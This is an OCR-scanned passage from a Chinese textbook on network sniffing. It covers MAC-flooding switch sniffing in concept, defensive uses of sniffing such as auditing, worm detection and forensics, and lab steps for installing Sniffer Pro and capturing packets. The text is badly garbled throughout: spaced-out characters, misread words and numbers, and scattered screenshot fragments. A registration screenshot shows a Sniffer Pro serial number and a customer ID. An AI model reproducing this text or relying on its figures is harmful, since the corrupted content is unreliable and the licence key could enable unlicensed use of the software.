来 的 协议 如 何 都 取决 于 交换 机 的 型 号 和 配置 。 由 于 进行 基于 端口 镜像 的 嗅 探 必 须 拥 有 交 
换 机 的 管理 权限 ,因此 ,基于 端口 镜像 的 嗅 探 往往 是 网 络 管理 员 常 用 的 嗅 探 方式 。 

5. 通过 MAC 泛滥 进行 交换 机 嗅 探 

这 种 方式 往往 被 攻击 者 使 用 。 网 络 交换 机 为 了 能 够 进行 分 组 交换 ,必须 在 内 部 维护 
一 个 转换 表 ,将 不 同 的 MAC 地 址 转换 成 交换 机 上 的 物理 端口 。 由 于 交换 机 的 工作 内 存 
"HER ,如 果 用 虚假 的 MAC 地 址 对 交换 机 进行 不 断 攻 击 ,直到 交换 机 的 工作 内 存 被 占 满 ， 
交换 机 就 进入 了 所 谓 的 “打开 失效 ”模式 ,开始 了 类 似 于 集线器 的 工作 方式 ,向 网 络 上 所 有 
的 机 器 广播 数据 包 。 在 这 种 情况 下 ,交换 机 嗅 探 就 可 以 同样 采用 广播 网 嗅 探 的 方式 实现 。 


3.1.4.4 噢 探 的 安防 作用 

1. 网 络 安 全 审计 

网 络 审计 是 指 通过 网 络 嗅 探 工具 ,将 网 络 数据 包 捕获 .解码 并 加 以 存储 ,以 备 后 期 查 
询 或 提供 即时 报警 。 通 过 嗅 探 技术 ,网络 审计 可 以 实现 上 网 行为 审计 、 网 络 违规 数据 的 监 
控 等 功能 。 利 用 网 络 嗅 探 技 术 开 发 的 网 络 行为 审计 类 软件 是 运行 在 关键 的 网 络 节点 ,对 
网 络 传输 的 数据 流 进行 合法 性 检查 的 工具 。 

2. 蠕虫 病毒 的 控制 

采用 嗅 探 技 术 , 对 蠕虫 病毒 的 控制 可 起 到 以 下 作用 : 

(1) 基于 网 络 嗅 探 的 流量 检测 ,及 时 发 现 网 络 流量 异常 ,并 根据 已 经 建成 的 流量 异常 
模型 ,初步 判断 出 网 络 蠕虫 病毒 爆发 的 前 兆 。 

(2) 基于 网 络 嗅 探 的 网 络 协议 分 析 ,进一步 确认 蠕虫 病毒 的 发 作 , 并 及 时 给 出 预警 
信息 。 
(3). 基于 网 络 嗅 探 技 术 的 蜜 镀 , 尽 早 捕获 蠕虫 病毒 的 样本 ,并 通过 对 其 进行 详细 的 分 
析 , 制 定 出 有 效 的 防御 方案 和 清除 方案 。 

(A) 通过 基于 网 络 嗅 探 技 术 的 入 侵 检 测 ,能 够 准确 定位 局 域 网 络 中 的 蠕虫 病毒 传播 
源 , 从 而 及 时 扼杀 蠕虫 病毒 的 传播 行为 。 

3. 网 络 布控 与 追踪 

针对 网 络 犯罪 ,如 黑客 入侵, 拒绝 服务 攻击 等 ,通过 嗅 探 技术 进行 追踪 ,协助 执法 部 门 
定位 网 络 犯罪 分 子 。 现 代 网 络 犯罪 往往 采用 跳板 进行 , 即 通过 一 台中 间 主 机 进行 网 络 攻 
击 和 犯罪 活动 ,这 对 犯罪 分 子 的 捕获 造成 了 很 大 的 障碍 ,而 嗅 探 技术 可 以 有 效 地 帮助 执法 
人 员 解 决 这 一 问题 。 

网 络 追踪 是 针对 伪造 IP 地 址 攻击 的 一 种 追查 方法 。 由 于 网 络 攻击 往往 采用 虚假 的 
IP 地 址 (特别 是 大 规模 的 拒绝 服务 攻击 ), 因 此 ,从 被 攻击 机 嗅 探 获 取 的 数据 无 法 直接 判 
断 攻 击 源 ,需要 采用 移动 的 网 络 嗅 探 器 ,以 溯源 的 方式 从 终点 逐个 前 溯 , 直 到 发 现 攻击 的 
起 源 点 。 

当 发 现 某 网 络 犯罪 行为 是 通过 中 间 跳 板 主机 进行 时 ,暂时 不 对 该 主机 进行 明显 的 操 
fe ,而 是 运行 网 络 嗅 探 器 对 其 进行 24 小 时 的 监控 ,一 旦 犯罪 分 子 远程 登录 该 主机 ,网 络 嗅 
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探 器 就 会 记录 该 犯罪 分 子 的 IP 地 址 ,从 而 协助 定位 和 追踪 。 目 前 ,国内 已 经 有 多 例 通 过 
网 络 布控 和 追踪 的 方式 抓获 犯罪 分 子 的 案例 ,其 中 也 往往 涉及 嗅 探 技 术 的 应 用 。 

4. 网 络 取证 

基于 嗅 探 的 网 络 取证 工具 可 以 运行 在 需要 取证 的 犯罪 分 子 所 使 用 的 计算 机 上 (如 个 
人 计算 机 或 公共 场所 的 计算 机 ) ,并 可 以 将 该 犯罪 分 子 的 网 络 行为 (如 邮件 、 聊 天 信息 、 上 
网 记录 等 ) 加 以 实时 记录 ,从 而 协助 案件 的 侦破 和 起 诉 证 据 的 获取 。 为 了 确保 利用 嗅 探 工 
具 所 获得 的 网 络 证 据 具 备 不 可 自 改 性 ,网 络 取证 工具 中 还 需要 内 置 数字 签名 工具 ,防止 操 
作 人 员 人 为 修改 或 误 删 数字 证 据 。 

嗅 探 技术 在 黑客 攻防 技术 及 信息 安全 体系 建设 中 都 起 到 了 非常 重要 的 作用 ,而 反 嗅 
探 技 术 也 是 确保 网 络 私密 性 的 关键 之 一 。 同 时 , 嗅 探 技 术 在 网 络 安全 管理 工作 中 也 具有 
很 大 的 帮助 。 但 是 ,在 进行 嗅 探 技 术 的 合法 应 用 的 同时 ,还 需要 关注 嗅 探 技 术 滥 用 带 来 的 
泄密 和 破坏 个 人 隐私 问题 。 在 未 来 , 随 着 网 络 技术 的 发 展 , 嗅 探 技术 和 反 嗅 探 技 术 还 将 不 
断 进步 ,目前 在 高 速 化 ,可 视 化 、 针 对 加 密 的 嗅 探 和 无 线 切入 技术 四 个 方向 上 都 可 以 见 到 
新 技术 的 出 现 。 


3.2 Sniffer 网 络 分 析 实 例 


3.2.1 Sniffer Pro 简介 


Sniffer Pro 软件 是 NAI 公司 推出 的 功能 强大 的 协议 分 析 软 件 。 利 用 Sniffer Pro 网 络 分 
析 器 的 强大 功能 和 特征 ,解决 网 络 问题 。 本 教材 使 用 的 软件 版 本 为 SnifferPro 4 70 530. 

Sniffer Pro 软件 的 主要 作用 可 以 体现 在 以 下 方面 : 

C) Sniffer 可 以 评估 业务 运行 状态 ,如 各 种 应 用 的 响应 时 间 , 一 个 操作 需要 的 时 间 ， 
应 用 带宽 的 消耗 ,应 用 的 行为 特征 ,应 用 性 能 的 瓶颈 等 。 

(2) Sniffer 能 够 评估 网 络 的 性 能 ,如 各 链 路 的 使 用 率 , 网 络 性 能 趋势 ,消耗 最 多 带宽 
的 具体 应 用 ,消耗 最 多 带宽 的 网 络 用 户 , 各 分 支 机 构 流量 状况 ,影响 网 络 性 能 的 主要 因素 。 

(3) Sniffer 可 以 快速 定位 故障 , monitor, expert, decode 等 功能 都 可 以 快速 定位 
故障 。 

(4) Sniffer 可 以 排除 潜在 的 威胁 ,如 病毒 .木马 .扫描 等 ,并 且 发 现 攻 击 的 来 源 , 为 控 
制 提 供 根据 ,对 蠕虫 类 型 等 对 网 络 影响 大 的 病毒 有 效 。 作 为 即时 监控 工具 ,Sniffer 通过 
发 现 网 络 中 的 行为 特征 来 判断 网 络 是 否 有 异常 流量 ,所 以 Sniffer 可 能 比 防 病毒 软件 更 快 


发 现 病毒 。 
(5) Sniffer 可 以 做 流量 的 趋势 分 析 , 通 过 长 期 监控 ,可 以 发 现 网 络 流量 的 发 展 趋势 ， 
为 将 来 网 络 改造 提供 建议 和 依据 。 


(6) 应 用 性 能 预测 。Sniffer 能 够 根据 捕获 的 流量 分 析 一 个 应 用 的 行为 特征 ,可 以 提 
供 量化 的 预测 ,准确 率 较 高 ,误差 不 超过 1096. 
Sniffer 包括 四 大 功能 : 监控 (monitor) 、 显 示 (display) 数据 包 捕 捉 (capture) 和 专家 
分 析 系 统 (expert) 。 
805 


3.2.2 程序 安装 实验 


实验 器 材 

。 Sniffer Pro 软件 系统 1 套 。 

* PC(Windows XP/Windows 7)1 台 。 

预习 要 求 

。 做 好 实验 预习 ,复习 网 络 协议 有 关内 容 。 

。 熟悉 实验 过 程 和 基本 操作 流程 。 

。 做 好 预习 报告 。 

实验 任务 

通过 本 实验 ,学 会 在 Windows 环境 下 安装 Sniffer; 能 够 运用 Sniffer 捕获 报 文 。 
实验 环境 

本 实验 采用 一 个 已 经 连接 并 配置 好 的 局 域 网 环境 。PC 上 安装 Windows 操作 系统 。 
预备 知识 

* TCP/IP 原理 及 基本 协议 。 

。 数据 交换 技术 概念 及 原理 。 

。 路 由 技术 及 实现 方式 。 
SEM 
按照 常规 安装 方法 双击 Sniffer 软件 的 安装 图 标 , 按 顺序 进行 (如 图 3. З 所 示 ) ,本 教 

材 选 用 的 软件 版 本 为 Sniffer Portable 4.7.5。 


fall Sniffer Portable 4.7.5 - InstallShield Wizard 


Welcome to the InstallShield Wizard 
for Sniffer Portable 4.7.5 


The InstallShield Wizard(TM) will help install Sniffer Portable 
4.7.5 оп your computer. To continue, dick Next. 


图 33 软件 安装 界面 


如 图 3.4 所 示 ,在 选择 Sniffer Pro 的 安装 目录 时 ,默认 安装 在 C:\Program Files\ 
NAISnifferNT 目录 中 ,为 了 更 好 地 使 用 ,建议 用 默认 路 径 进行 安装 。 


‘Setup will install Sniffer Pro in the following folder. 
To install to this folder. click Next. 
ate e ie be e LES es 


You can choose not to install Sniffer Pro by clicking Cancel to 
exit Setup. 


Destination Folder 


mm Files\NAISrifferNT Browse... 


Lee) 


34 安装 目录 选择 界面 


在 注册 用 户 时 ,需要 填写 必要 的 注册 信息 。 在 出 现 的 Sniffer Pro User Registration 
的 三 个 对 话 框 中 ,依次 填写 个 人 信息 。 如 图 3. 5 所 示 , 注 意 最 后 一 行 的 Sniffer Serial 


Number 需要 填 入 软件 购买 时 提供 的 注册 码 。 


I. * Please let us know where you [Megazine s ”区 
heard about this product, LAS 


Do you wish to receive 
announcements about this 
product? 


May we share your name with 
other companies that use NAI 
products? 


* Sniffer Serial Number 


图 35 用 户 注 册 界 面 


如 图 3. 6 所 示 ,完成 注册 操作 后 ,需要 设置 网 络 连接 状况 。 从 上 至 下 ,依次 有 三 个 选 
项 : Direct Connection to the Internet( 直 接连 接 )、Connection to the Internet through a 
Proxg( 通 过 代理 服务 器 连接 )、Not connected to network or dial-up. Print & fax option 
(拨号 .传真 或 无 连接 ) 。 一 般 情况 下 ,用 户 直 接 选 择 第 一 项 。 

如 图 3.7 所 示 , 若 通过 代理 服务 器 连接 , 则 需要 输入 代理 服务 器 地 址 ,用户 名 和 账号 


等 信息 。 


接 下 来 ,系统 会 自动 定位 并 连接 到 最 近 的 网 络 服务 器 Mercury. nai. com, 完 成 必要 的 
注册 信息 提交 和 注册 码 认 证 工作 。 当 用 户 的 注册 信息 验证 通过 后 ,系统 会 转 和 人 如 图 3. 8 
所 示 的 界面 ,用 户 被 告知 系统 分 配 的 身份 识别 码 ,以 便 用 户 进行 后 续 的 服务 和 咨询 。 
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If you are connecting to the Internet through 
dial-up networking, you may wish to connect now. 


If you ere connecting over a local area network, you 
may need to connect through a proxy. Please consult 
your system administrator. 


If you are unable to connect to the Internet, your 
registration information can be printed and saved. 


C Direct Connection to the Internet 
C Connection to the Internet through а Proxy 


Configure | 


С Wot connected to network or dial-up. 
Print & fax option. 


«r-5e[r-5o»] wa | 


Use HITP proxy at 


ae 


User 


Your user name and password will not 


be stored. 


> 
to the Internet through 
pu may wish to connect now. 


over а local area network, you 
Ene а proxy. Please consult 
itor. 


Fonnect to the Internet, your 
on can be printed and saved. 


ko the Internet 
[nternet through а Proxy 


Configure 


Ptwork or dial-up. 


Sy 


t 


win 
grm 
ў 
1 
$ 


[V] Locating nearest server 

[V] Connecting to service 

[V] Updating customer information 

[V] Communication with server complete 
Cleaning up communications 


Status: 


gistration complete! 

our customer identification number is 3168111. 
ease make a note of this value for future 
'eference. 


图 38 注册 信息 验证 界面 
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此 时 ,用 户 单 击 “ 下 一 步 ” 按 钮 时 ,系统 会 提示 用 户 保存 关键 性 的 注册 信息 ,六 


fF 生 成 一 


个 文本 格式 的 文件 Registration Summary. txt, 如 图 3. 9 所 示 。 该 文件 主要 包括 了 以 下 几 


个 重要 部 分 ,详细 内 容 可 参 
customer identification number( 用 户 身份 识别 码 ) 。 


照 图 3.10, 


* Contact Info( 服 务 器 连接 信息 ) 。 
* Product Sniffer Pro( 用 户 填写 的 身份 注册 信息 )。 
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Registration Results: 


User Registration Information 


Registration complete! 
Your customer identification number is 3168111. | 
ease пае а note of this value for future red 


| 
ontact Info Network Associati w 


[^ Display product information from the World Wid 


Finish | RUB | 


图 39 注册 信息 保存 提示 


User Registration Information 


Registration complete! 
|Your customer identification number is 3168111. 


|Please make a note of this value for future reference. 


Contact Info Network Associates 
| http: \\www. nai. com 


Phone # (408)988-3832 


Pro 
[Customer ID 3168111 


Mailing Address random 
| ХХХ, < Other > 000000 


Phone Number 000. 000. 0000000000 


[Receive Announcements No 
[Share Name No 
[Sniffer Registration SA154-2558Y-255T9-2LASH 


[E-Mail Address ххх@163. com 
[System ID 3ADD4972-0C41-4746— 
i B10D-SBCBDBF80D2A 


图 310 注册 文件 内 容 


由 于 Sniffer Pro 软件 的 运行 环境 需要 Java 环境 支持 ,因此 ,在 软件 使 用 前 安装 程序 
会 提示 用 户 安装 并 设置 Java 环境 (如 图 3.11 所 示 ) 。 


欢迎 使 用 Sun Microsystems, Inc. 的 Javaltm] 技术 1 令 Sun. 
QUIT 


你 的 电脑 已 经 安装 Java 软件 。 在 使 用 之 前 , 悠 必须 同意 以 下 的 许可 证 协议 。 


SUN MICROSYSTEMS, INC. 
二 进 制 代码 许可 协议 


JAVA SE RUNTIME ENVIRONMENT (JRE) VERSION 6 和 JAVAFX RUNTIME VERSION 
1 


SUN MICROSYSTEMS, INC. (“SUN”) 原意 授予 您 许可 证 ， 许 可 您 使 用 下 述 软件 ， 但 条 
件 是 您 必须 接受 本 二 进 制 代码 许 可 协议 的 所 有 条 款 以 及 增补 许可 条 款 (统称 “协议 ") |+ 
C 我 同意 (A), 请 继续 运行 Sun Microsystems, Inc. 的 Java 技术 。 

С 我 下 同意 (D), 请 停止 运行 Java 技术 。 


图 311 设置 аай 


接 下 来 ,系统 在 完成 关键 文件 复制 和 安装 的 工作 后 ,会 出 现 Setup Complete 提示 ,由 
于 Sniffer Pro 需要 将 网 卡 的 监听 模式 切换 为 混杂 ,所 以 需要 重新 启动 计算 机 来 完成 网 卡 
的 工作 模式 切换 , 当 软 件 提示 重新 启动 计算 机 时 ,按照 提示 操作 即 可 。 

重新 启动 计算 机 后 ,可 以 通过 运行 Sniffer Pro 来 监测 网 络 中 的 数据 包 。 通 过 选择 
“开始 ”| “程序 ”| Sniffer Pro-Sniffer 来 启动 程序 。 在 进入 主 界面 后 ,首先 要 配置 监听 网 
卡 。 一 般 情况 下 ,Sniffer Pro 初次 运行 时 会 自动 选择 机 器 网 卡 进 行 监听 。 如 果 本 地 计算 
机 有 多 个 网 卡 时 , 则 需要 手工 指定 。 具 体 方法 如 下 : 

(1) 选择 File 下 的 Settings Select 选项 。 

(2) 在 Select Settings 窗口 中 选择 监听 的 网 卡 ,同时 选择 Log Off 复 选 框 , 单 击 “ 确 
定 ? 按 钮 ,如 图 3. 12 所 示 。 

(3) 如 果 存 在 多 个 网 卡 , 则 需要 确定 最 终 的 监听 网 卡 ,如 图 3. 13 所 示 。 


Select Settings | 
Select settings for nonitoring: 


L [Realtek PCIe FE Family ишпи — 


WD \Device\Sniffer_{D9BC784B-CES1-43F1 
E Device XSniffer [D1963F14-5F32-443/ 
Delete. . 
| m| Log Off 


Са] аа эя | 


图 312 设置 提示 图 31 多 网 卡 设置 提示 


完成 上 述 操作 后 ,就 可 以 使 用 Sniffer Pro 对 目标 机 器 进行 网 络 监听 ,如 图 3. 14 所 
示 ,快捷 操作 功能 主要 包括 报 文 捕 获 及 网 络 性 能 监视 ,主要 监控 目标 机 器 的 网 络 流量 和 错 
误 数 据 包 情况 。 网 络 监听 的 主要 参考 指标 包括 网 络 使 用 率 (Utilization) 数据 包 传输 率 
(Packets/s) 、 错 误 数 据 情况 (Error/s)。 


›| n aja | [ва], 
sjal So) сіе 2] S| e| 
к g 


ази 快捷 操作 菜单 


实验 报告 要 求 

。 实验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 
。 阐述 碰 到 的 问题 以 及 解决 方法 。 

。 阐述 收获 与 体会 。 

思考 题 

CD 网 卡 的 工作 模式 有 几 种 ? 

(2) 阐述 监听 模式 的 具体 工作 情况 。 
3.2.3 数据 包 捕获 实验 
实验 器 材 

。 Sniffer Pro 软件 系统 1 套 。 

* PC(Windows XP/Windows 7)1 台 。 
预习 要 求 

。 做 好 实验 预习 ,复习 网 络 协议 有 关内 容 。 
。 熟悉 实验 过 程 和 基本 操作 流程 。 

。 做 好 预习 报告 。 


实验 任务 

通过 本 实验 ,熟练 掌握 Sniffer 数据 包 捕 获 功能 的 使 用 方法 。 

实验 环境 

本 实验 采用 一 个 已 经 连接 并 配置 好 的 局 域 网 环境 。PC 上 安装 Windows 操作 系统 。 
预备 知识 


。 数据 交换 技术 的 概念 及 原理 。 

。 路 由 技术 及 实现 方式 。 

实验 步骤 

1. 报 文 捕获 

数据 包 捕 捉 (capture) 是 将 所 有 的 数据 包 截 取 并 放 在 磁盘 缓冲 区 中 ,便于 分 析 。 基 本 
. 56 . 


原理 就 是 通过 软件 手段 设置 网 络 适 配器 (NIC) 的 工作 模式 ,在 这 种 模式 下 网 卡 接收 所 有 
的 数据 ,达到 网 络 监控 和 网 络 管理 的 功能 。 

如 图 3. 15 所 示 , 报 文 捕获 快捷 操作 的 功能 依次 为 开始 .暂停 .停止 .停止 显示 显示、 
定义 过 滤器 以 及 选择 过 滤器 ,一 般 情况 下 ,选择 默认 的 捕获 条 件 。 

Sniffer 在 启动 后 ,一 般 处 于 脱 机 模式 。 在 捕获 报 文 之 前 ,需要 进入 记录 模式 ,通过 选 
择 “ 文 件 ” 菜 单 下 的 “记录 于 ”来 启动 网 卡 的 监听 模式 。 也 可 以 通过 “ 选 定 设置 "选择 LOG 
On/Off 来 完成 上 述 操 作 。 此 时 ,可 根据 需要 进行 局 域 网 的 回环 测试 。 选 择 “ 捕 获 ” 菜 单 下 
的 “开始 ”或 直接 单 击 捕获 快捷 菜单 的 “开始 ”按钮 ,系统 会 开始 进行 网 络 报 文 的 捕获 。 

在 捕获 过 程 中 , 单 击 快捷 菜单 中 的 “捕获 面板 ”或 选择 “捕获 ”菜单 下 的 “捕获 面板 ” 选 
项 ,可 以 随时 查看 捕获 报 文 的 数量 以 及 数据 缓冲 区 的 利用 率 ,如 图 З. 16 所 示 。 


| 


图 315 捕获 报 文 快捷 操作 菜单 316 报 文 捕获 面板 


左 侧 仪表 显示 了 系统 当前 捕获 到 的 报 文 数量 , 右 侧 仪表 显示 了 捕获 报 文 的 数据 缓冲 
大 小 。 此 外 ,还 可 以 选择 “细节 ”功能 ,查看 详细 的 统计 信息 ,如 图 3. 17 所 示 。 


图 317 报 文 捕获 统计 信息 


捕获 到 的 报 文 存储 在 缓冲 区 内 。 使 用 者 可 以 显示 和 分 析 缓 冲 区 内 的 当前 报 文 ,也 可 
以 将 报 文保 存 到 磁盘 ,加 载 和 显示 之 前 保存 的 报 文 信息 ,进行 离线 分 析 和 显示 。 

整个 捕获 过 程 受 * 定 义 过 滤器 ?的 约束 ,选择 “捕获 ”菜单 下 的 “定义 过 滤器 ”, 单 击 “ 缓 
冲 ” 选 项 卡 ,对 捕获 缓冲 区 进行 设置 。 

首先 ,缓冲 区 的 大 小 由 用 户 自 定义 ,根据 实际 主机 的 内 存 容 量 进 行 调整 。 缓 冲 区 设置 
过 大 容易 造成 软件 运行 延迟 。 

其 次 ,数据 包 大 小 应 选择 适度 ,截取 部 分 数据 包 能 够 节省 磁盘 空间 ,保证 网 络 通信 流 
畅 ,避免 丢失 帧 。 

值得 一 提 的 是 , 当 禁 止 “ 保 存 到 文件 ”选项 时 ,可 以 选择 停止 捕获 条 件 , 即 缓冲 区 已 满 

此 外 ,也 可 以 通过 指定 文件 名 前 级 和 脱 机 文件 数 对 捕获 信息 进行 存储 ,如 图 3. 18 
所 示 。 
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图 318 捕获 缓冲 区 设置 


以 上 介绍 的 是 基本 捕获 方式 , 若 需 要 捕获 特定 主机 或 工作 站 的 数据 包 , 可 以 通过 选择 
“监视 器 ”菜单 的 “主机 列表 ”选项 查看 工作 站 信息 ,并 单 击 单个 主机 进行 数据 包 捕获 。 

2. 报 文 分 析 

为 了 有 效 进行 网 络 分 析 , 需 要 借助 于 专家 分 析 系 统 。 首 先 ,应 根据 网 络 协 议 环境 ,对 
专家 系统 进行 配置 。 选 择 “ 工 具 ” 菜 单 中 的 “专家 选项 ”, 如 图 3. 19 所 示 。 


| Subnet Masks | RIP Options ) 802.11 Options 
Objects Alarms | Protocols 
Object Analyze | Мах Objects | Est. Memory 一 一 | 所 需 内 存 容量 
Service Yes 1000 200K 
i Yes — 1000 600K 
Session Yes 1000 600K 
Connection Yes 1000 1.450K. 
Station. Yes 1000 700K 
DLC Yes 1000 512K 
Wireless Yes 1000 912K 
Wan Connection Yes 1024 696K 
捕获 中 选择 Wan Link Yes 1 8848 = 
EZ LIEU 7 Total Est Memory: 32.697K 
^w Expert During Capture Data Update Rate (seo; | 1 专家 系统 
BRAM | [7 Recycle Expert Objects Resotting R р || | 显示 频率 
e ing Rate [sec]: 60, ми 
系统 重 Да Cee Г qr ME M NM J 
i [100 ice 
Lowe | 


图 319 专家 选项 设置 


专家 系统 的 配置 能 够 帮助 分 析 人 员 专 注 于 特定 问题 ,通过 排除 某 些 系统 层 数 据 ,捕获 
到 网 络 分 析 所 需 的 特定 通信 和 量 。 同 时 ,根据 每 层 对 象 所 需 的 内 存 容量 ,来 创建 每 个 系统 层 
的 最 大 对 象 数 。 
专家 系统 提供 了 多 种 功能 和 配置 选项 ,具体 如 下 。 
。 在 专家 系统 的 设置 操作 中 ,“ 专 家 系统 重用 ”选项 定义 了 当 内 存 不 足 时 专家 系统 需 
要 进行 的 操作 , 即 覆 盖 原 有 数据 来 创建 新 对 象 (选中 ) 或 停止 创建 对 象 , 对 已 有 数 
据 进行 分 析 ( 未 选中 ) 。 
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* 默认 情况 下 , 当 数 据 包 捕 获 开 始 时 ,专家 系统 就 开始 分 析 进 入 缓冲 区 的 数据 包 , 并 
在 窗口 中 实时 显示 ,用户 可 以 在 捕获 的 同时 分 析 网 络 对 象 .症状 ,并 作出 诊断 。 用 
户 也 可 以 选择 禁用 实时 分 析 功 能 (未 选中 ) 。 
指定 可 创建 的 最 大 警报 数 。 当 达到 最 大 警报 数 时 ,专家 系统 会 覆盖 最 早 最 低级 别 
的 警报 (选中 ) 或 者 停止 创建 警报 。 
专家 系统 显示 的 刷新 频率 ,以 及 专家 系统 由 数据 分 析 操 作 到 数据 显示 操作 之 间 的 
延迟 。 
对 于 专家 系统 的 警报 闵 值 配置 ,可 以 选择 “工具 ”菜单 下 的 “专家 选项 ”中 的 “警报 / 
Alarms?” 进 行 具体 设置 。 

值得 注意 的 是 ,系统 默认 的 阔 值 都 是 经 过 精确 计算 的 ,可 保证 系统 进行 诊断 和 问题 检 
测 需 求 , 对 于 阔 值 的 修改 ,可 能 会 导致 系统 判断 失误 或 运行 错误 。 如 图 3. 20 所 示 ,对 于 每 
一 个 系统 层 存在 多 个 症状 诊断 的 警报 阔 值 信息 。 


Subnet Masks 
Objects 


Severity 
x | mmo | юй | 


图 320 专家 系统 阅 值 设置 


对 于 各 类 网 络 协议 ,用 户 可 以 进行 选择 性 的 监听 和 分 析 , 单 击 “ 警 报 /Alarms” 右 侧 的 
“协议 /Protocols” 设 置 项 ,如 图 3. 21 所 示 , 可 按照 系统 分 析 层 进行 协议 选择 。 

此 外 , 当 网 络 使 用 了 不 规范 的 子 网 掩 码 时 ,可 以 通过 选择 “ 子 网 掩 码 /Subnet Masks" 
设置 项 进行 更 改 。 

在 专家 系统 中 ,还 为 用 户 提供 了 用 于 检测 路 由 故障 的 路 由 信息 协议 分 析 (RIP) ,通过 
分 析 所 捕获 报 文 的 路 由 选择 协议 来 构建 路 由 表 并 显示 。 专 家 系统 通常 会 发 现 网 络 上 的 默 
认 路 由 器 ,同时 构建 一 条 通 向 网 关 的 默认 静态 路 由 。 如 果 选 择 使 用 RIP 分 析 方 式 , 则 需 
要 将 “对 象 " 设 置 项 中 的 连接 层 和 应 用 层 定义 为 “分 析 ” .如 图 3. 22 Bros 。 

在 专家 系统 属性 设置 中 ,还 特别 设 定 了 用 于 无 线 网 络 分 析 的 选项 。 在 启用 欺诈 AP 
查找 的 选项 后 ,专家 系统 就 会 对 访问 主机 的 MAC 地 址 和 选项 中 已 存 地 址 进行 比较 ,一 旦 
出 现 异常 就 会 生成 警报 。 

通过 “显示 ”菜单 下 的 “显示 设置 ”选项 ,可 以 自 定义 要 显示 的 分 析 内 容 。 如 图 3.23 所 
示 ,主要 包括 如 下 方面 。 
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图 32B 摘要 显示 设置 


单 击 添加 
默认 路 由 器 


设置 子 网 
地 址 和 掩 码 


• 普通 : 可 以 显示 或 隐藏 “主机 列表 ”“ 和 矩阵 ”“ 协 议 分布 "“ 统 计数 据 ” 等 。 
。 摘要 显示 : 可 以 定义 具体 显示 的 专家 症状 、 系 统 层 等 内 容 。 

* 协议 颜色 : 可 以 改变 显示 协议 所 使 用 的 字体 颜色 。 

。 协议 使 详 诉 : 可 以 设置 每 个 协议 的 详细 显示 设置 。 

。 解码 字体 : 可 以 更 改 “ 解 码 ? 显 示 中 文本 字体 类 型 .颜色 和 大 小 。 

具体 摘要 显示 选项 如 表 3. 1 和 表 3. 2 所 示 。 


表 3.1 摘要 显示 选项 说 明 


显示 选项 启用 功能 描述 
专家 系统 症状 为 每 个 帧 显示 所 发 现 的 上 一 个 症状 
全 部 层 显示 帧 中 所 包含 的 协议 层 , 每 个 协议 层 一 行 
网 络 地 址 显示 为 网 络 地 址 ,否则 为 硬件 地 址 


关键 区 域 信息 | MAC 地 址 中 的 厂商 ID | 在 MAC 地 址 的 开头 部 分 显示 供应 商 名 称 
网 络 地 址 的 名 称 解析 显示 网 络 地 址 的 名 称 , 而 不 是 数字 地 址 


地 址 短 解 析 名 称 如 果 工 作 站 在 地 址 德 中 已 命名 , 则 显示 其 名 称 , 而 不 是 地 址 
二 进 制 格式 显示 将 表示 为 两 个 窗口 ,以 显示 工作 站 之 间 的 通信 情况 
状态 当 数 据 包 出 现 异 常 时 ,显示 异常 状态 表示 ,如 表 3. 2 所 示 
绝对 时 间 显示 收 到 帧 的 时 间 
— Delta 时 间 显示 当前 帧 和 PEUT 
相对 时 间 显示 当前 帧 和 标记 帧 之 间 的 时 间 间 隔 
Len( 字 节 ) 显示 帧 的 长 度 
累计 的 字 节 显示 从 标记 帧 开始 ,到 当前 帧 的 所 有 帧 的 长 度 
表 3.2 状态 标志 说 明 
状态 标志 状态 描述 状态 标志 状态 描述 
M 数据 包 已 标记 帧 不 全 数据 包 小 于 64 字 节 ,无 CRC 错误 
A 数据 包 是 端口 A 捕获 到 的 分 段 数据 包 小 于 64 字 节 ,有 CRC 错误 
B 数据 包 是 端口 B 捕获 到 的 超大 数据 包 大 于 1518 字 节 ,无 CRC 错误 
# 数据 包 存 在 症状 ,或 具体 诊断 内 容 冲突 数据 包 由 于 冲突 而 损坏 
触发 器 数据 包 是 一 个 数据 触发 器 对 齐 数据 包 长 度 不 是 8 的 整数 倍 
CRC 具有 СКС 错误 、 大 小 正常 的 数据 包 | 地 址 重复 | 在 环 中 有 地 址 冲突 
超 长 具有 CRC 错误 、 大 小 超 长 的 数据 包 | 帧 复制 目的 主机 未 收 到 数据 包 


在 专家 系统 的 解码 显示 窗口 中 ,可 以 通过 “显示 ”菜单 下 的 “查找 帧 "来 获得 特定 帧 信 
息 , 查 找 帧 ”包含 四 个 选项 。 
* ЖЖ: 即 搜索 包含 特定 文本 字符 信息 的 帧 。 
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。 数据 : 即 搜索 包含 特定 数据 模式 的 帧 。 

。 状态 : 允许 搜索 具有 特定 状态 标志 的 帧 。 

。 专家 系统 : 允许 搜索 与 特定 专家 系统 症状 或 诊断 关联 的 帧 。 

专家 分 析 系 统 (expert) 能 够 对 缓冲 区 内 的 数据 包 进 行 综 合 分 析 , 将 捕获 内 容 按照 服 
务 、 应 用 、 连 接 、 工 作 站 、 路 由 、 子 网 等 类 别 进行 分 类 统计 ,并 对 存在 安全 隐患 和 问题 的 服务 
或 连接 进行 分 析 , 给 出 确切 的 结论 。 对 于 问题 内 容 , 将 注 明 其 所 属 层 次 (layer) 诊断 方式 
(diagnose) .基本 征兆 (symptom) 和 目标 (object) 。 

专家 分 析 平 台 可 以 对 网 络 流量 进行 实时 分 析 ,并 提供 客观 翔实 的 诊断 结果 ,主要 包括 
专家 分 析 系 统 .解码 系统 .矩阵 .主机 列表 协议 列表 以 及 统计 分 析 系统 ,只 要 单 击 * 停 止 并 
显示 ?就 可 以 查看 具体 的 网 络 分 析 数 据 , 如 图 3. 24 所 示 。 


系统 摘要 信息 
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图 324 报 文 捕获 显示 界面 


通过 专家 分 析 平 台 ,可 以 捕获 在 网 络 会 话 过 程 中 存在 的 各 类 潜在 问题 。 这 些 问题 被 
。 症状 : 网 络 会 话 情况 超过 专家 设 定 阅 值 ,表示 网 络 存 在 潜在 问题 。 
。 诊 断 : 多 个 一 起 分 析 的 症状 、 复 发 率 较 高 的 特定 症状 ,对 于 诊断 必须 立即 检查 。 
。 专家 系统 分 类 信息 : 显示 网 络 各 个 分 析 层 ,其 层次 性 与 ISO 层 相 类 似 。 
。 专家 系统 摘要 信息 : 根据 摘要 显示 设 定 的 各 层 显 示 数 据 。 
对 于 某 项 统计 分 析 可 以 通过 双击 方式 来 查看 对 应 记录 的 详细 统计 信息 ,如 图 3. 25 所 
对 于 每 一 项 记录 都 可 以 通过 查看 帮助 的 方式 来 了 解 产生 的 原因 。 
3. 解码 分 析 
